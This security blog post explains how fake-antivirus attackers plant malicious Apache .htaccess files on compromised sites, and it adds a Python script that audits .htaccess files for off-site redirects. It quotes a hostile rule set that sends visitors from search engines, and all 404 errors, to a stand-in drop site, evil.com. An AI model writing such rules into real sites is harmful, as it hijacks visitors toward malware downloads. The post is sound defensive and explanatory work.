dot HT what? More Fake Alert trickery.

Following on from the previous post about some of the tricks fake alert malware is getting up to [1], yesterday I noticed an interesting post on the Internet Storm Center diary [2]. It would appear attackers responsible for distributing the fake alert malware have started compromising the .htaccess files on web servers in order to redirect victims to the malware download sites [3].

The .htaccess files are essentially configuration files for some web servers (most commonly Apache). They enable web administrators to write powerful rules to control behaviour when a user browses content in that directory [4]. Most commonly they are used for:

  • redirecting to specific 404 or 403 error pages upon a navigation or authentication error
  • adding authentication to access certain sites/directories

The long and short of it is that our not-so-friendly-fake-alert-attackers appear to have uploaded malicious .htaccess files to various sites in order to redirect victims to the malware drop sites. An excerpt from a malicious file is shown below:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
# insert other common referrers here
# any request whose Referer matches one of the conditions above is redirected (R) to the drop site and rule processing stops (L)
RewriteRule .* http://evil.com/in.html?... [R,L]
# requests for pages that do not exist are sent to the drop site as well
Errordocument 404 http://evil.com/in.html?...

So what does this do? Basically they are redirecting page requests to the malicious drop site. Users accessing pages within this folder via one of the search engine referrers will be redirected, but so could search engines as well (as they spider the site). In the diary post on the ISC site, they speculate that this is how the attackers are getting their drop sites ranked highly in search engine results.
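A quick way for a site owner to check for this kind of tampering is to audit every .htaccess file for redirects that leave the site. The script below is an added example, not code from this post or from the ISC diary: it flags RewriteRule targets and ErrorDocument targets that point at an external host, and notes when a RewriteRule is gated by HTTP_REFERER conditions, which is the signature of the excerpt above. The sample .htaccess contents, the trusted hostnames and the evil.example placeholder are constructed for the example.

```python
import os
import re

# Constructed sample modelled on the excerpt in the post; the drop-site
# host is a placeholder, not a real indicator.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
# insert other common referrers here
RewriteRule .* http://evil.example/in.html [R,L]
ErrorDocument 404 http://evil.example/in.html
"""

# Constructed benign file: local error page, local redirect, basic auth.
BENIGN_HTACCESS = """\
ErrorDocument 404 /errors/notfound.html
RewriteEngine On
RewriteRule ^old-page$ /new-page [R=301,L]
AuthType Basic
AuthName "Staff"
AuthUserFile /var/www/.htpasswd
Require valid-user
"""

# Hypothetical hostnames that legitimately belong to the audited site.
TRUSTED_HOSTS = {"example.com", "www.example.com"}

ABS_URL = re.compile(r"^https?://([^/\s]+)", re.IGNORECASE)


def _external_host(target):
    """Return the hostname if target is an absolute URL to an untrusted host."""
    m = ABS_URL.match(target)
    if not m:
        return None  # relative path or non-URL argument
    host = m.group(1).lower()
    return None if host in TRUSTED_HOSTS else host


def audit_htaccess(text):
    """Return a list of findings for directives that redirect off-site."""
    findings = []
    referer_conds = 0  # RewriteCond lines on HTTP_REFERER awaiting a RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()  # Apache directive names are case-insensitive
        if directive == "rewritecond":
            if len(parts) >= 2 and "%{HTTP_REFERER}" in parts[1].upper():
                referer_conds += 1
        elif directive == "rewriterule" and len(parts) >= 3:
            host = _external_host(parts[2])
            if host:
                reason = "RewriteRule redirects to external host"
                if referer_conds:
                    reason += " (gated by %d HTTP_REFERER condition(s))" % referer_conds
                findings.append({"line": lineno, "directive": raw,
                                 "reason": reason, "host": host})
            referer_conds = 0  # conditions apply only to the next RewriteRule
        elif directive == "errordocument" and len(parts) >= 3:
            host = _external_host(parts[2])
            if host:
                findings.append({"line": lineno, "directive": raw,
                                 "reason": "ErrorDocument points to external host",
                                 "host": host})
    return findings


def audit_tree(root):
    """Walk a document root and audit every .htaccess file found."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = audit_htaccess(fh.read())
            if hits:
                results[path] = hits
    return results


if __name__ == "__main__":
    for hit in audit_htaccess(SAMPLE_HTACCESS):
        print("line %(line)d: %(reason)s -> %(host)s" % hit)
```

Run `audit_tree("/var/www")` (or whatever the document root is) from cron and diff the output against the previous run; any new external host is worth a look. The check only catches absolute off-site targets, so a rule pointing at a malicious page the attacker has also uploaded locally would be missed. Where .htaccess files are not needed at all, setting `AllowOverride None` in the server configuration stops Apache from reading them in the first place, which removes this vector entirely.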

Once redirected, the user is presented with a now-familiar interface, this time for ‘Windows Antivirus’. The “file-scanning” effect is achieved by the usual JavaScript [6].

[Screenshot of fake alert malware drop site]

The malware installed from this site is detected as Troj/FakeAV-DL.

Attacks involving malicious .htaccess files on legitimate web sites have been seen before in various other scams [7]. At the end of the day, if an attacker has freedom to upload or modify .htaccess files on your web server it is game over.